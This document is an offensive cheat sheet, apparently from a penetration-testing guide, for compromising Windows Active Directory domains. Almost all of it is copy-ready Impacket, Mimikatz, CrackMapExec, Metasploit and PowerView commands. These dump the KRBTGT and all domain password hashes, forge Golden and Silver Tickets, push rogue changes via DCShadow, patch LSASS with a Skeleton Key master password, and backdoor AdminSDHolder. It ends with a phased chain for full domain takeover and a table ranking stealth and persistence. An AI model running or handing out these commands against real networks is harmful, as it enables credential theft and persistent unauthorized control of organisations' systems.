Advanced AD Attacks

Golden Ticket Attacks

KRBTGT Service Overview

Service Purpose: The KRBTGT account is a built-in service account used by the Key Distribution Center (KDC) service on domain controllers to encrypt and sign all Ticket Granting Tickets (TGTs).

Why Target KRBTGT: This account's password hash is the master key for all Kerberos authentication in the domain. Compromising it grants unlimited domain access.

Golden Ticket Attack

Purpose: Forge TGTs using the compromised KRBTGT hash to gain persistent, undetectable domain access as any user.

Requirements: KRBTGT NTLM hash, domain SID, domain name

Attack Value: Complete domain access, bypasses password changes, near-undetectable

KRBTGT Hash Extraction

Using Impacket

# Extract KRBTGT hash from domain controller
python3 secretsdump.py <domain>/<username>:<password>@<DC-IP> -just-dc-user krbtgt

# Using NTLM hash authentication
python3 secretsdump.py -hashes :<NTLM-hash> <domain>/<username>@<DC-IP> -just-dc-user krbtgt

Using Mimikatz

# Extract KRBTGT hash directly from DC
mimikatz "privilege::debug" "lsadump::lsa /patch" exit | findstr krbtgt

# DCSync to extract KRBTGT remotely (if permissions available)
mimikatz "lsadump::dcsync /domain:<domain.com> /user:krbtgt"

Using CrackMapExec

# Extract KRBTGT via DCSync with CME
crackmapexec smb <DC-IP> -u '<username>' -p '<password>' --ntds --user krbtgt

Golden Ticket Creation

Using Impacket

# Create Golden Ticket for any user with Domain Admin privileges
python3 ticketer.py -nthash <krbtgt-hash> -domain-sid <domain-sid> -domain <domain.com> administrator

# Golden Ticket with custom user and extended lifetime
python3 ticketer.py -nthash <krbtgt-hash> -domain-sid <domain-sid> -domain <domain.com> \
    -duration 87600 -user-id 500 fakeadmin

# Use Golden Ticket for domain access
export KRB5CCNAME=administrator.ccache
python3 psexec.py <domain.com>/administrator@<target-server> -k -no-pass

Using Mimikatz

# Create Golden Ticket
mimikatz "kerberos::golden /user:administrator /domain:<domain.com> /sid:<domain-sid> /krbtgt:<krbtgt-hash> /ticket:golden.kirbi"

# Create Golden Ticket with custom groups
mimikatz "kerberos::golden /user:fakeadmin /domain:<domain.com> /sid:<domain-sid> /krbtgt:<krbtgt-hash> /groups:512,513,518,519,520 /ticket:golden.kirbi"

# Pass the Golden Ticket
mimikatz "kerberos::ptt golden.kirbi"

Using Metasploit

# Golden Ticket creation via Metasploit
msfconsole
use auxiliary/admin/kerberos/forge_ticket
set DOMAIN <domain.com>
set USER administrator
set SID <domain-sid>
set KRBTGT_HASH <krbtgt-hash>
run

---

Silver Ticket Attacks

Service Principal Names (SPN) Overview

Service Purpose: SPNs uniquely identify service instances for Kerberos authentication. Each service (SQL, HTTP, CIFS) has an associated service account.

Why Target Service Accounts: Service tickets are encrypted with the service account's password hash. Compromising this hash allows forging service tickets.

Silver Ticket Attack

Purpose: Forge service tickets (TGS) using compromised service account hashes to access specific services without contacting the domain controller.

Requirements: Service account NTLM hash, service SPN, domain SID

Attack Value: Service-specific access, stealthier than Golden Tickets, no DC communication

Service Account Hash Extraction

Using Impacket

# Kerberoasting to extract service account hashes
python3 GetUserSPNs.py <domain>/<username>:<password> -dc-ip <DC-IP> -request -outputfile kerberoast.txt

# Crack service account passwords
hashcat -m 13100 kerberoast.txt /usr/share/wordlists/rockyou.txt

# Extract computer account hash for HOST services
python3 secretsdump.py <domain>/<username>:<password>@<target-server>

Using CrackMapExec

# Automated Kerberoasting
crackmapexec ldap <DC-IP> -u '<username>' -p '<password>' --kerberoasting kerberoast_output.txt

Using Metasploit

# Kerberoasting via Metasploit
msfconsole
use auxiliary/gather/get_user_spns
set RHOSTS <DC-IP>
set DOMAIN <domain.com>
set USERNAME <username>
set PASSWORD <password>
run

Silver Ticket Creation and Usage

Using Impacket

# Silver Ticket for SQL Server access
python3 ticketer.py -nthash <service-hash> -domain-sid <domain-sid> -domain <domain.com> \
    -spn MSSQLSvc/<sql-server>.<domain.com>:1433 administrator

# Silver Ticket for file share access (CIFS)
python3 ticketer.py -nthash <computer-hash> -domain-sid <domain-sid> -domain <domain.com> \
    -spn cifs/<file-server>.<domain.com> administrator

# Use Silver Ticket to access SQL Server
export KRB5CCNAME=administrator.ccache
python3 mssqlclient.py <domain.com>/administrator@<sql-server> -k -no-pass

Using Mimikatz

# Create Silver Ticket for MSSQL
mimikatz "kerberos::golden /user:administrator /domain:<domain.com> /sid:<domain-sid> /target:<sql-server.domain.com> /service:MSSQLSvc /rc4:<service-hash> /ticket:silver.kirbi"

# Create Silver Ticket for CIFS
mimikatz "kerberos::golden /user:administrator /domain:<domain.com> /sid:<domain-sid> /target:<file-server.domain.com> /service:cifs /rc4:<computer-hash> /ticket:silver.kirbi"

# Pass the Silver Ticket
mimikatz "kerberos::ptt silver.kirbi"

---

DCSync Attacks

Directory Replication Service (DRS) Overview

Service Purpose: DRS allows domain controllers to replicate Active Directory data between each other to maintain consistency across the domain.

Why Target DRS: Accounts with replication rights can request password data from domain controllers, effectively extracting all domain hashes remotely.

DCSync Attack

Purpose: Impersonate a domain controller to request password hashes from other DCs using legitimate replication protocols.

Requirements: Account with "Replicating Directory Changes" and "Replicating Directory Changes All" permissions

Attack Value: Extract all domain password hashes without accessing NTDS.dit file directly

DCSync Execution

Using Impacket

# DCSync all domain password hashes
python3 secretsdump.py <domain>/<username>:<password>@<DC-IP> -just-dc

# DCSync specific high-value accounts
python3 secretsdump.py <domain>/<username>:<password>@<DC-IP> -just-dc-user administrator
python3 secretsdump.py <domain>/<username>:<password>@<DC-IP> -just-dc-user krbtgt

# DCSync using NTLM hash
python3 secretsdump.py -hashes :<NTLM-hash> <domain>/<username>@<DC-IP> -just-dc

Using Mimikatz

# DCSync specific user
mimikatz "lsadump::dcsync /domain:<domain.com> /user:administrator"

# DCSync all users
mimikatz "lsadump::dcsync /domain:<domain.com> /all"

# DCSync targeting specific DC
mimikatz "lsadump::dcsync /domain:<domain.com> /dc:<dc-name> /user:krbtgt"

Using CrackMapExec

# DCSync via CrackMapExec
crackmapexec smb <DC-IP> -u '<username>' -p '<password>' --ntds

# DCSync specific users
crackmapexec smb <DC-IP> -u '<username>' -p '<password>' --ntds --user administrator

Granting DCSync Permissions

Using Impacket

# Grant DCSync rights to compromised account
python3 dacledit.py <domain>/<username>:<password> -action write -rights DCSync \
    -principal <compromised-user> -target-dn "DC=domain,DC=com"

Using PowerView

# Grant DCSync permissions with PowerView
Add-DomainObjectAcl -TargetIdentity "DC=domain,DC=com" -PrincipalIdentity <compromised-user> -Rights DCSync

---

DCShadow Attacks

Domain Controller Registration Overview

Service Purpose: Domain controllers register themselves in Active Directory to participate in replication. This registration process can be abused to inject malicious changes.

Why Target Registration: By temporarily registering as a domain controller, attackers can push arbitrary changes to Active Directory that appear legitimate.

DCShadow Attack

Purpose: Register a rogue domain controller to inject undetectable changes into Active Directory.

Requirements: High privileges (Enterprise/Domain Admin), Windows Server with AD DS capability, multi-DC environment

Attack Value: Persistent backdoors, undetectable directory modifications, bypass security monitoring

DCShadow Implementation

Using Mimikatz (Primary Method)

# Setup DCShadow (requires two Mimikatz instances)

# Instance 1: Register as domain controller and prepare changes
mimikatz "privilege::debug"
mimikatz "lsadump::dcshadow /object:CN=targetuser,CN=Users,DC=domain,DC=com /attribute:servicePrincipalName /value:HTTP/fake-service"

# Instance 2: Push changes to legitimate DCs
mimikatz "lsadump::dcshadow /push"

Common DCShadow Targets

# Add SPN to user account for Kerberoasting
mimikatz "lsadump::dcshadow /object:CN=targetuser,CN=Users,DC=domain,DC=com /attribute:servicePrincipalName /value:HTTP/fake-spn.domain.com"

# Modify user group membership
mimikatz "lsadump::dcshadow /object:CN=targetuser,CN=Users,DC=domain,DC=com /attribute:memberOf /value:CN=Domain Admins,CN=Users,DC=domain,DC=com"

# Create shadow credentials
mimikatz "lsadump::dcshadow /object:CN=targetuser,CN=Users,DC=domain,DC=com /attribute:msDS-KeyCredentialLink /value:<certificate-data>"

---

Skeleton Key Attacks

Local Security Authority (LSA) Overview

Service Purpose: The LSA process (LSASS) handles authentication and security policy enforcement on Windows systems, including domain controllers.

Why Target LSA: Patching LSASS memory allows modification of authentication logic without changing actual account passwords.

Skeleton Key Attack

Purpose: Patch LSASS on domain controllers to accept a master password for any domain account while maintaining normal authentication.

Requirements: Administrative access to domain controller, memory patching capability

Attack Value: Universal backdoor password, maintains stealth, works until reboot

Skeleton Key Implementation

Using Mimikatz

# Install Skeleton Key on domain controller (default password: mimikatz)
mimikatz "privilege::debug" "misc::skeleton" exit

# Custom Skeleton Key password
mimikatz "privilege::debug" "misc::skeleton /password:MyCustomPass123" exit

Using Metasploit

# Deploy Skeleton Key via Metasploit
msfconsole
use post/windows/manage/skeleton_key
set SESSION <session-id>
set PASSWORD <custom-password>
run

Testing Skeleton Key Access

Using Various Tools

# Test access with skeleton key password (SMB)
smbclient //<target-server>/c$ -U administrator%mimikatz

# RDP access with skeleton key
rdesktop <target-server> -u administrator -p mimikatz

# WinRM access with skeleton key
python3 wmiexec.py <domain>/administrator:mimikatz@<target-server>

# CrackMapExec testing
crackmapexec smb <target-server> -u administrator -p mimikatz

---

AdminSDHolder Abuse

AdminSDHolder Mechanism Overview

Service Purpose: AdminSDHolder is a special AD object that acts as a template for protecting high-privilege accounts. The SDProp process runs hourly to reset ACLs on protected accounts based on AdminSDHolder's ACL.

Why Target AdminSDHolder: Modifying its ACL grants persistent permissions to all protected accounts (Domain Admins, Enterprise Admins, etc.).

AdminSDHolder Abuse Attack

Purpose: Modify AdminSDHolder's ACL to maintain persistent administrative permissions that survive permission resets.

Requirements: Write permissions to AdminSDHolder object

Attack Value: Persistent privilege escalation, survives ACL resets, stealthy persistence mechanism

AdminSDHolder Modification

Using Impacket

# Grant Full Control to compromised user on AdminSDHolder
python3 dacledit.py <domain>/<username>:<password> -action write -rights FullControl \
    -principal <compromised-user> -target "CN=AdminSDHolder,CN=System,DC=domain,DC=com"

# Grant WriteDacl permission for ongoing access
python3 dacledit.py <domain>/<username>:<password> -action write -rights WriteDacl \
    -principal <compromised-user> -target "CN=AdminSDHolder,CN=System,DC=domain,DC=com"

Using PowerView

# Import PowerView for AdminSDHolder manipulation
Import-Module PowerView.ps1

# Add ACE to AdminSDHolder
Add-DomainObjectAcl -TargetIdentity "CN=AdminSDHolder,CN=System,DC=domain,DC=com" \
    -PrincipalIdentity "<compromised-user>" -Rights All -Verbose

# Grant WriteDacl permission specifically
Add-DomainObjectAcl -TargetIdentity "CN=AdminSDHolder,CN=System,DC=domain,DC=com" \
    -PrincipalIdentity "<compromised-user>" -Rights WriteDacl -Verbose

Using Native Windows Tools

# Using dsacls (Windows built-in tool)
dsacls "CN=AdminSDHolder,CN=System,DC=domain,DC=com" /G <compromised-user>:GA

# Using PowerShell AD module
Set-Acl -Path "AD:\CN=AdminSDHolder,CN=System,DC=domain,DC=com" -AclObject $NewAcl

Exploiting AdminSDHolder Permissions

Post-SDProp Exploitation

# After SDProp runs (every hour), compromised user gains permissions over all protected accounts

# Add user to Domain Admins group
python3 dacledit.py <domain>/<compromised-user>:<password> -action write \
    -target "CN=Domain Admins,CN=Users,DC=domain,DC=com" \
    -principal <another-user> -rights FullControl

# Reset password of Domain Admin account using gained permissions
python3 changepasswd.py <domain>/<compromised-user>:<password> -newpass <new-password> <target-admin>

---

Integrated Advanced Attack Strategy

Progressive Domain Compromise

# Phase 1: Gain initial access and escalate to DCSync permissions
python3 dacledit.py <domain>/<username>:<password> -action write -rights DCSync \
    -principal <compromised-user> -target-dn "DC=domain,DC=com"

# Phase 2: Extract KRBTGT hash via DCSync
python3 secretsdump.py <domain>/<compromised-user>:<password>@<DC-IP> -just-dc-user krbtgt

# Phase 3: Create Golden Ticket for persistence
python3 ticketer.py -nthash <krbtgt-hash> -domain-sid <domain-sid> -domain <domain.com> administrator

# Phase 4: Establish AdminSDHolder persistence
export KRB5CCNAME=administrator.ccache
python3 dacledit.py <domain.com>/administrator@<DC-IP> -k -no-pass -action write \
    -target "CN=AdminSDHolder,CN=System,DC=domain,DC=com" -principal <backup-user> -rights FullControl

# Phase 5: Deploy Skeleton Key for immediate access (if DC access available)
# Execute on domain controller: mimikatz "privilege::debug" "misc::skeleton"

# Phase 6: Create service-specific access via Silver Tickets
python3 ticketer.py -nthash <service-hash> -domain-sid <domain-sid> -domain <domain.com> \
    -spn MSSQLSvc/<sql-server>.<domain.com>:1433 administrator

Attack Persistence Matrix

Attack Type	Persistence Duration	Detection Difficulty	Access Scope	Tool Options
Golden Ticket	Until KRBTGT reset (years)	Very High	Complete Domain	Impacket, Mimikatz, Metasploit
Silver Ticket	Until service password change	High	Specific Services	Impacket, Mimikatz
DCSync	Until permissions revoked	Medium	Password Extraction	Impacket, Mimikatz, CrackMapExec
DCShadow	Permanent until cleanup	Very High	Directory Modifications	Mimikatz (Windows only)
Skeleton Key	Until DC reboot	Medium	All Domain Accounts	Mimikatz, Metasploit
AdminSDHolder	Until manual cleanup	High	Protected Accounts	Impacket, PowerView, Native Tools

Critical Success Indicators

• Golden Ticket: Domain-wide access with forged authentication

• Silver Ticket: Service access without domain controller communication

• DCSync: Remote extraction of all domain credentials

• DCShadow: Undetectable directory modifications and persistent backdoors

• Skeleton Key: Universal backdoor authentication method

• AdminSDHolder: Persistent permissions over high-privilege accounts

These advanced techniques represent complete Active Directory compromise, providing multiple persistence mechanisms and stealth capabilities that can maintain access for extended periods while offering flexibility in tool choice and implementation methods.